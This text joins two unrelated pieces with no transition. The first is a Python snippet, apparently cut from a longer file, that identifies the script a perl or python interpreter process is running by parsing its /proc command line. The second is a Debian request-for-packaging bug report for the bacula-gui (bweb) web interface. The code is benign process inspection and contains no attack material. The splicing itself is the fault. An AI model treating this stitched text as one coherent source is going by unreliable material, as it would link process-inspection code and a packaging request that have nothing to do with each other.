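# /usr/bin/python2.7 have to match as well as /usr/bin/python.
INTERPRETER_RE = re.compile(r'^/usr/bin/(perl|python)[0-9.]*$')
ARGV0_RE = re.compile(r'^(perl|python)[0-9.]*$')

# Assumed option tables (illustrative, not exhaustive):
#   value  = options whose argument is the next argv element
#   inline = options after which no script file follows
RULES = {
    'perl': {'value': {'-I'}, 'inline': {'-e', '-E'}},
    'python': {'value': {'-W', '-Q', '-X'}, 'inline': {'-c', '-m'}},
}


def real_program(exe, raw_cmdline):
    """Return the script run by an interpreter process, else exe unchanged."""
    m = INTERPRETER_RE.match(exe)
    if not m:
        return exe
    rules = RULES[m.group(1)]
    text = raw_cmdline.rstrip(b'\0').decode('utf-8', 'replace')
    # The kernel separates argv elements with NUL bytes. A daemon that rewrote
    # its title (perl's $0, setproctitle) leaves one space-separated string.
    args = text.split('\0') if '\0' in text else text.split()
    if args and ARGV0_RE.match(os.path.basename(args[0])):
        args = args[1:]  # drop the interpreter itself
    it = iter(args)
    for arg in it:
        if arg in rules['inline']:
            return exe  # code given on the command line: no script file
        if arg in rules['value']:
            next(it, None)  # skip the option's argument
            continue
        if arg.startswith('-'):
            continue
        # First non-option argument is the script. A relative path cannot be
        # resolved without the process cwd, so keep the interpreter then.
        return arg if arg.startswith('/') else exe
    return exe


def real_program_for_pid(pid):
    """Same lookup for a live process (Linux /proc)."""
    exe = os.readlink('/proc/%d/exe' % pid)
    with open('/proc/%d/cmdline' % pid, 'rb') as fh:
        return real_program(exe, fh.read())


if __name__ == '__main__':
    # Constructed sample command lines, not taken from the report.
    samples = [
        ('/usr/bin/python2.7', b'/usr/bin/python\0-u\0/usr/sbin/denyhosts\0'),
        ('/usr/bin/perl', b'/usr/sbin/smokeping [FPing]'),
        ('/usr/bin/python2.7', b'python\0-c\0import time\0'),
    ]
    for exe, raw in samples:
        print(exe, '->', real_program(exe, raw))
```

When no script can be determined the function returns the interpreter path, so a caller falls back to the behaviour it had before the lookup.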
Bug#656891: RFP: bacula-gui -- Bweb is a Bacula web interface
Package: wnpp
Severity: wishlist

* Package name: bacula-gui
  Version : 5.0.3
  Upstream Author : Kern Sibbald k...@sibbald.com
* URL : http://sourceforge.net/projects/bacula/
* License : GPL
  Programming Lang: Perl
  Description : Bweb is a Bacula web interface

bacula-gui contains bweb which is a web interface for managing bacula: reporting, clients status, media management, restore (needs libjs-extjs), etc.

Upstream tarball contains an old debian/ directory which is maybe a good way to start packaging bweb. Maybe more appropriate to name the package bweb. At this time, bacula version 5.0.3 is in the archive and i think the version of bweb needs to be the same (for compatibility and the catalog schema ?).

bacula-gui also contains brestore which is a Perl/Gtk console for restoring files. The tool seems to be quite old and bat included in the bacula project seems to be more powerful.

Finally, the bacula-gui tarball also contains bacula-web, which is a reporting only web tool written in PHP; the project was abandoned in the last few years and has been revived in 2011 and distributed outside bacula-gui (so no need to package it).